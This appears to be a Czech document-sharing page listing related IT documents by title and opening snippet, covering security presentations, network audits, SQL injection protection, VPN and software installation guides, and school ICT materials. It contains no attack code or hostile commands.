Uživatelská dokumentace

Uživatelská dokumentace Uživatelská dokumentace Verze 14-06 2010 Stahování DTMM (v rámci služby Geodata Distribution) OBSAH OBSAH...2 1. O MAPOVÉM SERVERU...3 2. NASTAVENÍ PROSTŘEDÍ...3 2.1 Hardwarové požadavky...3 2.2 Softwarové

Více

Tyto slidy jsou volně k dispozici účastníkům prezentace, včetně dalšího šíření v rámci jejich organizace. Pokud prezentaci nebo její část použijete bez provedení zásadních změn v obsahu, prosím uveďte

Více

Jan Pilař Microsoft MCP MCTS MCSA

Jan Pilař Microsoft MCP MCTS MCSA Jan Pilař Microsoft MCP MCTS MCSA Proč je bezpečnost a detekce takové téma? Protože zabezpečení koncové stanice je často stále jen pomocí antimalware Protože ověření identity uživatele je často stále pouze

Více

- PC musí být připojené v lokální síti - je bezpodmínečně nutné, aby aplikace Outlook nebyla aktivní)

- PC musí být připojené v lokální síti - je bezpodmínečně nutné, aby aplikace Outlook nebyla aktivní) (CETIN) INSTALACE nové verze aplikace Entrust (ESP Entrust Security Provider) (určeno k šifrování souborů a podepisování souborů a zabezpečení e-mailu (šifrování, podpis), aplikace umožňuje současné použití

Více

Jen technická ochrana nestačí. Ing. Jindřich Hlaváč, CISA hlavac@dcit.cz DCIT, a.s., http://www.dcit.cz

Jen technická ochrana nestačí. Ing. Jindřich Hlaváč, CISA hlavac@dcit.cz DCIT, a.s., http://www.dcit.cz Jen technická ochrana nestačí Ing. Jindřich Hlaváč, CISA hlavac@dcit.cz DCIT, a.s., http://www.dcit.cz Statistika nuda je Statistika technologií 98 % uživatelů PC používá antivirový program 70 % uživatelů

Více

Windows 2008 R2 - úvod. Lumír Návrat

Windows 2008 R2 - úvod. Lumír Návrat Windows 2008 R2 - úvod Lumír Návrat Operační systémy Windows Stručný přehled Klientské OS Windows 95, 98, ME Windows NT Windows 2000 Windows XP Windows Vista Windows 7 Windows 8 Windows 8.1 Windows 10

Více

Zabezpečení proti SQL injection

Zabezpečení proti SQL injection Zabezpečení proti SQL injection ESO9 intranet a.s. Zpracoval: Tomáš Urych U Mlýna 2305/22, 141 Praha 4 Záběhlice Dne: 19.9.2012 tel.: +420 585 203 370-2 e-mail: info@eso9.cz Revize: Urych Tomáš www.eso9.cz

Více

DNSSEC Validátor - doplněk prohlížečů proti podvržení domény

DNSSEC Validátor - doplněk prohlížečů proti podvržení domény DNSSEC Validátor - doplněk prohlížečů proti podvržení domény CZ.NIC z.s.p.o. Martin Straka / martin.straka@nic.cz Konference Internet a Technologie 12 24.11.2012 1 Obsah prezentace Stručný úvod do DNS

Více

Sdílení dat. Autor : Bc.Jiří Lipár

Sdílení dat. Autor : Bc.Jiří Lipár Sdílení dat Autor : Bc.Jiří Lipár Cíl semináře Seznámit s postojem právního řádu ke sdílení dat Seznámit s modely sdílení dat Seznámit s programy na sdílení dat Seznámit se situací ohledně pirátství u

Více

1 Správce licencí Správce licencí Správce licencí Start > Všechny programy > IDEA StatiCa > Správce licencí Soubor > Správce licencí Licence

1 Správce licencí Správce licencí Správce licencí Start > Všechny programy > IDEA StatiCa > Správce licencí Soubor > Správce licencí Licence 1 Správce licencí Programy IDEA jsou chráněny proti neoprávněnému použití. Pro běh programu je vyžadována platná licence. Upozornění: Lokální licence na pracovní stanici a síťová licence Eleckey jsou softwarové

Více

Vzdálený přístup k počítačům

Vzdálený přístup k počítačům Vzdálený přístup k počítačům jedna z nejstarších služeb vzdálený přístup k sálovým počítačům nejprve vzdálené terminály později terminálová emulace jako jedna ze služeb počítačové sítě současnost využíváno

Více

Radim Dolák Gymnázium a Obchodní akademie Orlová

Radim Dolák Gymnázium a Obchodní akademie Orlová Radim Dolák Gymnázium a Obchodní akademie Orlová Úvod Cíl prezentace Samba historie a budoucnost Samba - vlastnosti Samba verze 4 a 4.1 Instalace Současný a plánovaný stav Instalace Správa Testování a

Více

Tomáš Kantůrek. IT Evangelist, Microsoft

Tomáš Kantůrek. IT Evangelist, Microsoft Tomáš Kantůrek IT Evangelist, Microsoft Správa a zabezpečení PC kdekoliv Jednoduchá webová konzole pro správu Správa mobilních pracovníků To nejlepší z Windows Windows7 Enterprise a další nástroje Cena

Více

Uživatelská dokumentace

Uživatelská dokumentace Uživatelská dokumentace k projektu CZECH POINT Popis použití komerčního a kvalifikovaného certifikátu Vytvořeno dne: 20.5.2008 Aktualizováno: 23.5.2008 Verze: 1.3 Obsah Uživatelská dokumentace...1 Obsah...2

Více

Obsah. Úvod 9 Komu je kniha určena 11 Konvence použité v knize 11

Obsah. Úvod 9 Komu je kniha určena 11 Konvence použité v knize 11 Úvod 9 Komu je kniha určena 11 Konvence použité v knize 11 KAPITOLA 1 Instalace a úvod do Windows Vista 13 Instalace z disku DVD 14 Volba uživatelského účtu 16 První kroky v grafickém rozhraní 18 Práce

Více

První seznámení s mobilní aplikací PATRIOT GPS

První seznámení s mobilní aplikací PATRIOT GPS První seznámení s mobilní aplikací PATRIOT GPS 1 Obsah 1 Získání aplikace... 3 2 První spuštění... 3 2.1 Založení uživatelského účtu... 3 2.2 Založení vozidla... 4 3 Ovládání vozidla... 5 3.1 Menu vozidla...

Více

Směrnice Bezpečnost počítačové sítě a ochrana osobních údajů.

Směrnice Bezpečnost počítačové sítě a ochrana osobních údajů. Směrnice Bezpečnost počítačové sítě a ochrana osobních údajů. ECOdate s.r.o. Zpracoval: Ing. Miroslav Řepa Platnost od 23.5.2018 OBSAH: 1 Účel... 3 2 Platnost... 3 3 Použité zkratky a pojmy... 3 3.1 Zkratky...

Více

Uživatel počítačové sítě

Uživatel počítačové sítě Uživatel počítačové sítě Intenzivní kurz CBA Daniel Klimeš, Ivo Šnábl Program kurzu Úterý 8.3.2005 15.00 18.00 Teoretická část Středa 9.3.2005 15.00 19.00 Praktická práce s počítačem Úterý 15.3.2005 15.00

Více

Současný svět Projekt č. CZ.2.17/3.1.00/32038, podpořený Evropským sociálním fondem v rámci Operačního programu Praha adaptabilita

Současný svět Projekt č. CZ.2.17/3.1.00/32038, podpořený Evropským sociálním fondem v rámci Operačního programu Praha adaptabilita Aktivní webové stránky Úvod: - statické webové stránky: pevně vytvořený kód HTML uložený na serveru, ke kterému se přistupuje obvykle pomocí protokolu HTTP (HTTPS - zabezpečený). Je možno používat i různé

Více

Audit bezpečnosti počítačové sítě

Audit bezpečnosti počítačové sítě Jiří Kalenský kalenj1@fel.cvut.cz Audit bezpečnosti počítačové sítě Semestrální práce Y36SPS Zadání Prověřit bezpečnost v dané počítačové síti (cca 180 klientských stanic) Nejsou povoleny destruktivní

Více

Téma: PC viry II. Vytvořil: Vítězslav Jindra. Dne: 11. 1. 2012. VY_32_Inovace/1_058

Téma: PC viry II. Vytvořil: Vítězslav Jindra. Dne: 11. 1. 2012. VY_32_Inovace/1_058 Téma: PC viry II. Vytvořil: Vítězslav Jindra Dne: 11. 1. 2012 VY_32_Inovace/1_058 1 Anotace: Interaktivní prezentace seznamuje žáka s nejběžnějšími typy PC virů a způsoby, jak se před nimi bránit. Prezentace

Více

Connection Manager - Uživatelská příručka

Connection Manager - Uživatelská příručka Connection Manager - Uživatelská příručka 1.0. vydání 2 Obsah Aplikace Správce připojení 3 Začínáme 3 Spuštění Správce připojení 3 Zobrazení stavu aktuálního připojení 3 Připojení k internetu 3 Připojení

Více

Nastavení klientských stanic pro webové aplikace PilsCom s.r.o.

Nastavení klientských stanic pro webové aplikace PilsCom s.r.o. Nastavení klientských stanic pro webové aplikace PilsCom s.r.o. Obsah 1. Obecné informace... 1 2. Internetový prohlížeč... 1 3. Nastavení kompatibilního zobrazení... 1 4. Nastavení důvěryhodných serverů...

Více

Příručka pro nasazení a správu výukového systému edu-learning

Příručka pro nasazení a správu výukového systému edu-learning Příručka pro nasazení a správu výukového systému edu-learning Obsah: Edu-learning pro firmy a organizace... 2 Varianty nasazení... 2 A. Systém umístěný v lokální síti zákazníka... 3 B. Systém umístěný

Více

Nejlepší zabezpečení chytrých telefonů

Nejlepší zabezpečení chytrých telefonů Nejlepší zabezpečení chytrých telefonů CHRAŇTE své soukromí; některé kontakty se mají zobrazit výhradně vám ZABEZPEČTE své kontakty, fotografie a soubory pro případ ztráty nebo zcizení telefonu NAJDĚTE

Více

vlastnosti Výsledkem sledování je: a) Využití aplikací b) Používání internetu c) Vytížení počítačů d) Operační systém e) Sledování tisků

vlastnosti Výsledkem sledování je: a) Využití aplikací b) Používání internetu c) Vytížení počítačů d) Operační systém e) Sledování tisků Program Aktivity propojuje prvky softwarového a personálního auditu, které jsou zaměřeny na optimalizaci firemních nákladů. Slouží ke zjištění efektivity využívání softwarového a hardwarového vybavení

Více

TRAPS PRVNÍ SKUTEČNĚ FUNGUJÍCÍ OCHRANA PRO DESKTOPY A SERVERY

TRAPS PRVNÍ SKUTEČNĚ FUNGUJÍCÍ OCHRANA PRO DESKTOPY A SERVERY ANTIVIRUS JE MRTEV TRAPS PRVNÍ SKUTEČNĚ FUNGUJÍCÍ OCHRANA PRO DESKTOPY A 14. listopadu 2017 SERVERY Jakub Jiříček, CISSP, CNSE jjiricek@paloaltonetworks.com Srovnání účinnosti tradiční a nové ochrany koncových

Více

Jednotlivé hovory lze ukládat nekomprimované ve formátu wav. Dále pak lze ukládat hovory ve formátu mp3 s libovolným bitrate a také jako text.

Jednotlivé hovory lze ukládat nekomprimované ve formátu wav. Dále pak lze ukládat hovory ve formátu mp3 s libovolným bitrate a také jako text. 1.0 Nahrávání hovorů Aplikace Nahrávání hovorů ke svému chodu využívá technologii od společnosti Cisco, tzv. Built-in bridge, která snižuje nároky na síťovou infrastrukturu, snižuje náklady a zvyšuje efektivitu

Více

Instrukce pro vzdálené připojení do učebny 39d

Instrukce pro vzdálené připojení do učebny 39d Instrukce pro vzdálené připojení do učebny 39d Každá skupina má k dispozici jedno sdílené připojení, prostřednictvím kterého se může vzdáleně připojit do učebny 39d a pracovat na svých semestrálních projektech

Více

Αlpha 8 instalace a upgrade. Poznámky k instalaci Αlpha V8, Logical Medical Systems. GENNET s.r.o Kostelní 9 170 00 Praha 7

Αlpha 8 instalace a upgrade. Poznámky k instalaci Αlpha V8, Logical Medical Systems. GENNET s.r.o Kostelní 9 170 00 Praha 7 Poznámky k instalaci Αlpha V8, Logical Medical Systems GENNET s.r.o Kostelní 9 170 00 Praha 7 David Stejskal uživatelská podpora david.stejskal@gennet.cz Jana Vávrová uživatelská podpora jana.vavrova@gennet.cz

Více

Nejčastější podvody a útoky na Internetu. Pavel Bašta

Nejčastější podvody a útoky na Internetu. Pavel Bašta Nejčastější podvody a útoky na Internetu Pavel Bašta pavel.basta@nic.cz 25.05.2017 CZ.NIC, z.s.p.o. Hlavní činnost správa doménových jmen.cz CSIRT.CZ Národní CSIRT tým pro ČR Založen v rámci plnění grantu

Více

Číslo a název šablony III / 2 = Inovace a zkvalitnění výuky prostřednictvím ICT

Číslo a název šablony III / 2 = Inovace a zkvalitnění výuky prostřednictvím ICT Číslo projektu CZ.1.07/1.5.00/34.0556 Číslo a název šablony III / 2 = Inovace a zkvalitnění výuky prostřednictvím ICT klíčové aktivity Označení materiálu VY_32_INOVACE_SO_IKT_16 Název školy Střední průmyslová

Více

Audit bezpečnosti počítačové sítě. Předmět: Správa počítačových sítí Jiří Kalenský kalenj1@fel.cvut.cz

Audit bezpečnosti počítačové sítě. Předmět: Správa počítačových sítí Jiří Kalenský kalenj1@fel.cvut.cz Audit bezpečnosti počítačové sítě Předmět: Správa počítačových sítí Jiří Kalenský kalenj1@fel.cvut.cz Zadání Prověřit bezpečnost v dané počítačové síti (cca 180 klientských stanic) Nejsou povoleny destruktivní

Více

Platební systém XPAY [www.xpay.cz]

Platební systém XPAY [www.xpay.cz] Platební systém XPAY [www.xpay.cz] implementace přenosu informace o doručení SMS verze 166 / 1.3.2012 1 Obsah 1 Implementace platebního systému 3 1.1 Nároky platebního systému na klienta 3 1.2 Komunikace

Více

Při konfiguraci domácího směrovače a bezdrátové sítě se setkáte s obrovským počtem zkratek, jejichž význam je jen málokdy dostatečně vysvětlen.

Při konfiguraci domácího směrovače a bezdrátové sítě se setkáte s obrovským počtem zkratek, jejichž význam je jen málokdy dostatečně vysvětlen. 1 Při konfiguraci domácího směrovače a bezdrátové sítě se setkáte s obrovským počtem zkratek, jejichž význam je jen málokdy dostatečně vysvětlen. Bez jejich znalosti však jen stěží nastavíte směrovač tak,

Více

Zabezpečení proti SQL injection

Zabezpečení proti SQL injection Zabezpečení proti SQL injection ESO9 intranet a.s. Zpracoval: Tomáš Urych U Mlýna 2305/22, 141 Praha 4 Záběhlice Dne: 19.9.2012 tel.: +420 585 203 370-2 e-mail: info@eso9.cz Revize: Urych Tomáš www.eso9.cz

Více

Relační vrstva SMB-Síťový komunikační protokol aplikační vrstvy, který slouží ke sdílenému přístupu k souborům, tiskárnám, sériovým portům.

Relační vrstva SMB-Síťový komunikační protokol aplikační vrstvy, který slouží ke sdílenému přístupu k souborům, tiskárnám, sériovým portům. Aplikační vrstva http-protokol, díky kterému je možné zobrazovat webové stránky. -Protokol dokáže přenášet jakékoliv soubory (stránky, obrázky, ) a používá se také k různým dalším službám na internetu

Více

Bezpečnostní zásady. Příloha č. 1 k Podmínkám České národní banky pro používání služby ABO-K internetové bankovnictví

Bezpečnostní zásady. Příloha č. 1 k Podmínkám České národní banky pro používání služby ABO-K internetové bankovnictví Bezpečnostní zásady Česká národní banka (ČNB) věnuje trvalou pozornost nadstandardnímu zabezpečení aplikace ABO-K internetové bankovnictví (dále jen ABO-K ), proto využívá moderní technologie pro ochranu

Více

Bezpečnostní rizika chytrých spotřebičů a Internetu věcí

Bezpečnostní rizika chytrých spotřebičů a Internetu věcí Bezpečnostní rizika chytrých spotřebičů a Internetu věcí Poznatky z digitální hranice routerů Turris Patrick Zandl patrick.zandl@nic.cz 20.4.2017 Aktivity zaměřené na bezpečnost Vytvoření sítě zabezpečených

Více

Po prvním spuštění Chrome Vás prohlížeč vyzve, aby jste zadali své přihlašovací údaje do účtu Google. Proč to udělat? Máte několik výhod:

Po prvním spuštění Chrome Vás prohlížeč vyzve, aby jste zadali své přihlašovací údaje do účtu Google. Proč to udělat? Máte několik výhod: Internetový prohlížeč CHROME Pro správné fungování veškerých funkcionalit, které nám nástroje společnosti Google nabízí, je dobré používat prohlížeč Chrome. Jeho instalaci je možné provést z webové adresy:

Více

INSTALACE SOFTWARE A AKTIVACE PRODUKTU NÁVOD

INSTALACE SOFTWARE A AKTIVACE PRODUKTU NÁVOD INSTALACE SOFTWARE A AKTIVACE PRODUKTU NÁVOD www.aktion.cz Obsah: Kompletní instalace (serverová část) str. 03 Aktivace produktu první spuštění str. 10 Instalace Windows klienta na jiný počítač v síti

Více

Firewall, IDS a jak dále? Flow monitoring a NBA, případové studie. Jiří Tobola INVEA-TECH

Firewall, IDS a jak dále? Flow monitoring a NBA, případové studie. Jiří Tobola INVEA-TECH Firewall, IDS a jak dále? Flow monitoring a NBA, případové studie Jiří Tobola INVEA-TECH INVEA-TECH Český výrobce řešení FlowMon pro monitorování a bezpečnost síťového provozu Desítky referencí na českém

Více

Scénáře a důvody pro nasazení Exchange 2010 a Lync 2010. Martin Panák

Scénáře a důvody pro nasazení Exchange 2010 a Lync 2010. Martin Panák Scénáře a důvody pro nasazení Exchange 2010 a Lync 2010 Martin Panák 1 Agenda Exchange Server 2010 Lync OnLine 2010 Scénáře nasazení Uživatelské rozhraní Vybavení ROI 2 3 Koho oslovit Zákazník provozuje

Více

SMiS Občan. verze 1.3

SMiS Občan. verze 1.3 SMiS Občan verze 1.3 SMiS Občan uživatelská příručka k aplikaci Copyright 2004 Triada, spol. s r. o. Triada, spol. s r. o. U svobodárny 1110/12 190 00 Praha 9-Libeň tel.: 284 001 284 fax: 284 818 027 e-mail:

Více

Identifikátor materiálu: ICT-2-05

Identifikátor materiálu: ICT-2-05 Identifikátor materiálu: ICT-2-05 Předmět Téma sady Informační a komunikační technologie Téma materiálu Uživatelské účty, přístupová práva Autor Ing. Bohuslav Nepovím Anotace Student si procvičí / osvojí

Více

Nastavení klientských stanic pro webové aplikace PilsCom s.r.o.

Nastavení klientských stanic pro webové aplikace PilsCom s.r.o. Nastavení klientských stanic pro webové aplikace PilsCom s.r.o. Obsah 1. Obecné informace...1 2. Internetový prohlížeč...1 3. Nastavení kompatibilního zobrazení...1 4. Nastavení důvěryhodných serverů...2

Více

Vzdálené připojení do sítě ČEZ VPN Cisco AnyConnect

Vzdálené připojení do sítě ČEZ VPN Cisco AnyConnect Vzdálené připojení do sítě ČEZ VPN Cisco AnyConnect Návod pro instalaci klienta pro vzdálené připojení do sítě ČEZ a. s., pomocí sítě Internet pro externí uživatele Verze 1.02 Verze Stručný popis změn

Více

POKYNY K REGISTRACI PROFILU ZADAVATELE

POKYNY K REGISTRACI PROFILU ZADAVATELE POKYNY K REGISTRACI PROFILU ZADAVATELE Stav ke dni 4. 12. 2012 Obsah: 1 Úvod... 3 1.1 Podmínky provozu... 3 1.2 Pokyny k užívání dokumentu... 3 2 Registrace profilu zadavatele... 4 2.1 Přihlášení uživatele...

Více

INSTALACE. programu WinDUO. pod Windows 7 / Windows Vista. ČAPEK-WinDUO, s.r.o.

INSTALACE. programu WinDUO. pod Windows 7 / Windows Vista. ČAPEK-WinDUO, s.r.o. ČAPEK-WinDUO, s.r.o. INSTALACE programu WinDUO pod Windows 7 / Windows Vista 1) Instalace programu WinDUO 2) Nastavení práv 3) První spuštění 4) Doporučení 5) Co Vás při instalaci mohlo potkat 6) Archivace

Více

Střední průmyslová škola, Trutnov, Školní 101 Centrum odborného vzdělávání v elektrotechnice a ICT

Střední průmyslová škola, Trutnov, Školní 101 Centrum odborného vzdělávání v elektrotechnice a ICT Mít bezpečné auto: Aktivní bezpečnost (jízdní asistenti) Pasivní bezpečnost Dodržovat pravidla silničního provozu Přizpůsobit jízdu stavu vozovky a provozu Předvídat možné situace Nemůže se mi nic stát?

Více

SADA VY_32_INOVACE_PP1

SADA VY_32_INOVACE_PP1 SADA VY_32_INOVACE_PP1 Přehled anotačních tabulek k dvaceti výukovým materiálům vytvořených Ing. Janem Prašivkou. Kontakt na tvůrce těchto DUM: prasivka@szesro.cz Úvod do informatiky VY_32_INOVACE_PP1.PRA.01

Více

Administrace služby - GTS Network Storage

Administrace služby - GTS Network Storage 1. Návod k ovládání programu Cisco VPN Client (IP SECový tunel pro přístup GTS Network Storage) Program Cisco VPN client lze bezplatně stáhnout z webových stránek GTS pod odkazem: Software ke stažení http://www.gts.cz/cs/zakaznicka-podpora/technicka-podpora/gtspremium-net-vpn-client/software-ke-stazeni.shtml

Více

Bezpečnostní aspekty informačních a komunikačních systémů PS2-1

Bezpečnostní aspekty informačních a komunikačních systémů PS2-1 Bezpečnost informací BI Ing. Jindřich Kodl, CSc. Bezpečnostní aspekty informačních a komunikačních systémů PS2-1 1 Literatura Doseděl T.: Počítačová bezpečnost a ochrana dat, Computer Press, 2004 Časopis

Více

Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115

Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115 Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115 Číslo projektu: Číslo šablony: 28 CZ.1.07/1.5.00/34.0410 Název materiálu: Ročník: Identifikace materiálu: Jméno autora: Předmět: Tématický celek:

Více

Internet Banka v mobilu

Internet Banka v mobilu Internet Banka v mobilu Obsah Co je Internet Banka v mobilu?... 3 Co umí Internet Banka v mobilu?... 3 Kdo může používat Internet Banku v mobilu?... 3 Na jakých telefonech Internet Banka v mobilu funguje?...

Více

Hrozby a trendy Internetbankingu

Hrozby a trendy Internetbankingu Pohled banky na bezpečnost přímého bankovnictví David Pikálek Česká spořitelna, a.s. Přímé bankovnictví Agenda 1. Zkušenost roku 2008 v ČR 1. Phishing 2. Pharming 2. Aktuální trendy v bezpečnosti ADK 1.

Více

Formy komunikace s knihovnami

Formy komunikace s knihovnami Formy komunikace s knihovnami Současné moderní prostředky Jiří Šilha a Jiří Tobiáš, Tritius Solutions a.s., Brno Osnova Základní požadavky na komunikaci s knihovnami Historie komunikace s knihovnami Confluence

Více

Penetrační testování

Penetrační testování Penetrační testování Michal Zeman Ing. Ladislav Beránek, CSc., MBA Školní rok: 2008-09 Abstrakt Práce se zabývá testováním zranitelnosti informačních systémů. Tyto systémy se dnes velmi rozšiřují a často

Více

BankKlient. FAQs. verze 9.50

BankKlient. FAQs. verze 9.50 BankKlient FAQs verze 9.50 2 BankKlient Obsah: Úvod... 3 Instalace BankKlient možné problémy... 3 1. Nejsou instalovány požadované aktualizace systému Windows... 3 2. Instalační program hlásí, že nemáte

Více

ISPOP v roce Ing. Pavla Jirůtková - oddělení ISPOP. CENIA, česká informační agentura životního prostředí

ISPOP v roce Ing. Pavla Jirůtková - oddělení ISPOP. CENIA, česká informační agentura životního prostředí ISPOP v roce 2016 Ing. Pavla Jirůtková - oddělení ISPOP CENIA, česká informační agentura životního prostředí Seminář pro ohlašovatele, EnviGroup, Praha, 27. 1. 2016 Obsah prezentace (podrobněji, než je

Více

Michal Andrejčák, Klub uživatelů ŘS MicroSCADA, Hotel Omnia Janské Lázně, SDM600 Stručný popis a reference.

Michal Andrejčák, Klub uživatelů ŘS MicroSCADA, Hotel Omnia Janské Lázně, SDM600 Stručný popis a reference. Michal Andrejčák, Klub uživatelů ŘS MicroSCADA, Hotel Omnia Janské Lázně, 19.-20.10.2016 Stručný popis a reference Slide 1 Agenda Vlastnosti Reference Stadtwerken München Reference ČEZ distribuce, a.s.

Více